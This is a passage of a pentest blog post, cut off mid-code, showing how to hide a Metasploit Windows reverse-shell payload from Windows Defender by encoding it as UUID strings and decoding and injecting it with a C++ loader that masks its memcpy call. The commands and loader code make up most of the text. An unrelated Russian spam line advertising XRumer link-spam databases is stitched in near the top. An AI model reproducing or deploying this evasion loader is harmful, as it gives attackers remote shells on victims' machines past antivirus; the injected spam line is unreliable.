{{tag>IT-Security Windows Kali pentest obfuscation blog english}} Оптимальный результат дадут свежие базы для xrumer https://www.olx.ua/d/uk/obyavlenie/progon-hrumerom-dr-50-po-ahrefs-uvelichu-reyting-domena-IDXnHrG.html, содержащие актуальные ссылки. ===== Tools ===== The encoder is part of my shellcode tool [[https://github.com/psycore8/shencode|ShenCode]], which is available as open source. ===== Step1: Prepare shellcode ===== ==== generate ==== We create a payload without further encryption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encode ==== We now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> The output now looks something like this: <code cpp> [*] try to open file [+] reading 240906.001 successful! [*] try to generate UUIDs std::vector<std::string> sID = { "fce88f00-0000-6031-d264-8b523089e58b", "520c8b52-148b-7228-0fb7-4a2631ff31c0", "ac3c617c-022c-20c1-cf0d-01c74975ef52", "578b5210-8b42-3c01-d08b-407885c0744c", ... "c85fffd5-83f8-007d-2858-68004000006a", "0050680b-2f0f-30ff-d557-68756e4d61ff", "d55e5eff-0c24-0f85-70ff-ffffe99bffff", "ff01c329-c675-c1c3-bbf0-b5a2566a0053", "ffd5" }; [+] DONE! </code> ===== Step 2: Write Inject.cpp ===== ==== Header ==== === obfuscated shellcode === We create a new C++ project and adopt the obfuscated string array that we created previously. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #include <sstream> #include <vector> #include <iomanip> #pragma warning std::vector<std::string> sID = { "fce88f00-0000-6031-d264-8b523089e58b", "520c8b52-148b-7228-0fb7-4a2631ff31c0", "ac3c617c-022c-20c1-cf0d-01c74975ef52", "578b5210-8b42-3c01-d08b-407885c0744c", ... "c85fffd5-83f8-007d-2858-68004000006a", "0050680b-2f0f-30ff-d557-68756e4d61ff", "d55e5eff-0c24-0f85-70ff-ffffe99bffff", "ff01c329-c675-c1c3-bbf0-b5a2566a0053", "ffd5" }; </code> ==== Encoding and injection ==== === Remove superfluous characters === Firstly, we need a function to remove the ''-'' characters. We pass a string to this function, which is then cleaned up. <code cpp> void removeDashes(std::string& str) { str.erase(std::remove(str.begin(), str.end(), '-'), str.end()); } </code> === Convert strings to bytes === The next function converts the UUID strings into executable bytes. The string array is run through piece by piece: * Remove from ''-'' * Read 2 characters and return them as bytes * When the string array has been run through, return the generated byte array to the caller <code cpp> std::vector<uint8_t> convertToBytes(const std::vector<std::string>& inputStrings) { std::vector<uint8_t> byteArray; for (const auto& str : inputStrings) { std::string cleanStr = str; removeDashes(cleanStr); for (size_t i = 0; i < cleanStr.length(); i += 2) { if (i + 1 < cleanStr.length()) { std::string byteString = cleanStr.substr(i, 2); uint8_t byte = static_cast<uint8_t>(std::stoi(byteString, nullptr, 16)); byteArray.push_back(byte); } } } return byteArray; } </code> === Main programme === The main program initialises the variables, calls the conversion function, outputs the bytes to the console and then executes the injection. To disguise this process somewhat, the function ''%%memcpy%%'' is not called directly, but linked to our own function via a pointer. <code cpp> int main() { std::vector<std::string> input = sID; std::vector<uint8_t> result = convertToBytes(input); unsigned char* Payload = reinterpret_cast<unsigned char*>(result.data()); size_t byteArrayLength = result.size(); std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl; for (size_t i = 0; i < byteArrayLength; ++i) { std::cout << std::hex << std::setw(2) << std::setfill('0') << static_cast<int>(Payload[i]) << " "; if ((i + 1) % 8 == 0) { std::cout << st